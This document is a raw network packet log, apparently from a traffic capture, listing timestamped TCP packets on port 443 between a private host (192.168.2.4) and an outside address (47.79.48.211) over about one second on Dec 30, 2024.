                                                                                                                                                                    Dec 30, 2024 04:59:04.983443975 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.983450890 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.983475924 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.983490944 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.985057116 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.985071898 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.985136032 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.985146999 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.988805056 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.989958048 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.989974976 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.990036964 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.990044117 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.991826057 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.040324926 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.040343046 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.040395975 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.040402889 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.040429115 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.040441036 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.046947956 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.046962976 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.047041893 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.047049046 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.047106028 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.052309990 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.052325010 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.052375078 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.052382946 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.052494049 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.057368994 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.057389975 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.057441950 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.057450056 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.057482958 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.057502031 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.062737942 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.062752962 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.062799931 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.062807083 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.062836885 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.062850952 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.067017078 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.067038059 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.067079067 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.067090034 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.067153931 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.067282915 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.068567038 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.068581104 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.068648100 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.068660021 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.068767071 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.073514938 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.073529959 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.073574066 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.392088890 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.397073984 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.397089958 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.397139072 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.397147894 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.397219896 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.403964043 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.403980970 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.404016972 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.404022932 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.404045105 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.404125929 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.404208899 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.404223919 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.404254913 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.404261112 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.404284954 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.404295921 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.407798052 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.407812119 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.407849073 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.407856941 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.407875061 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.407891035 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.472974062 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.472990036 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.473031998 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.473046064 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.473066092 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.473079920 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.473400116 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.473416090 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.473458052 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.473465919 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.473754883 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.474040985 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.474056005 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.474075079 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.474111080 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.474116087 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.474221945 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.475533962 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.475565910 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.475591898 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.475598097 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.475616932 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.475634098 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.480627060 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.480647087 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.480678082 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.480685949 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.480709076 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.480758905 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.487451077 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.487474918 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.487508059 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.487514973 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.487536907 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.487560987 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.487778902 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.487799883 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.487831116 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.487838030 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.487859964 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.487879038 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.491456985 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.491475105 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.491540909 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.491549969 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.491585970 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.556543112 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.556560993 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.556610107 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.556618929 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.556664944 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.556948900 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.556962967 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.557025909 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.557034016 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.557061911 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.557070971 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.557496071 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.557512045 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.557547092 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.557553053 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.557574034 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.557590961 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.559041023 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.559058905 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.559102058 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.559108973 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.559139013 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.559161901 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.564238071 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.564254999 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.564292908 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.564300060 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.564315081 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.564332962 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.570935011 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.570950985 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.571010113 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.571018934 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.571381092 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.571402073 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.571433067 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.571441889 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.571451902 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.571480036 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.575072050 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.575088978 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.575148106 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.575155020 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.576761961 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.640211105 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.640227079 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.640269995 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.640283108 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.640310049 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.640331984 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.640535116 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.905931950 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.905946016 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.909375906 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.909389973 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.909463882 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.909473896 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.912769079 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.974479914 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.974500895 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.974596024 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.974610090 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.974643946 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.974654913 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.975115061 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975130081 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975179911 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.975191116 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975280046 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975297928 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975338936 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.975347042 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.975359917 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.975387096 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.976867914 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.976886034 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.976929903 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.976936102 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.976963043 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.976974010 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.981888056 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.981903076 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.981985092 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.981993914 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.982419968 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.988677025 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.988693953 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.988785982 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.988795042 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.989398003 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.989414930 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.989464045 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.989470959 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:05.989491940 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:05.989522934 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.083000898 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.083014965 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.083106995 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.083117008 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.083780050 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.084404945 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084419966 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084484100 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.084491968 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084909916 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084927082 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084963083 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.084969044 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.084985018 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.085010052 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.085764885 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.085777998 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.085818052 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.085825920 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.085834980 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.085853100 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.089885950 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.089900970 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.089962006 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.089971066 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.092777014 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.096900940 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.096918106 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.096987009 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.096993923 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.098789930 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.103782892 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.103796959 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.103863955 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.103871107 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.104624987 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.104645014 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.104677916 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.104686022 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.104703903 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.104733944 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.105662107 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174391031 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174417019 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174472094 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174483061 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174508095 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174515963 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174568892 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174591064 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174624920 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174631119 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.174650908 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.174664021 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.175247908 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.175270081 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.175302982 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.175309896 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.175348043 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.175371885 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.176206112 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.176222086 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.176264048 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.176279068 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.176753044 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.177148104 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.177165031 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.177194118 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.177210093 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.177218914 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.177243948 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:06.192455053 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192471981 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192542076 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:06.192542076 CET49732443192.168.2.447.79.48.211
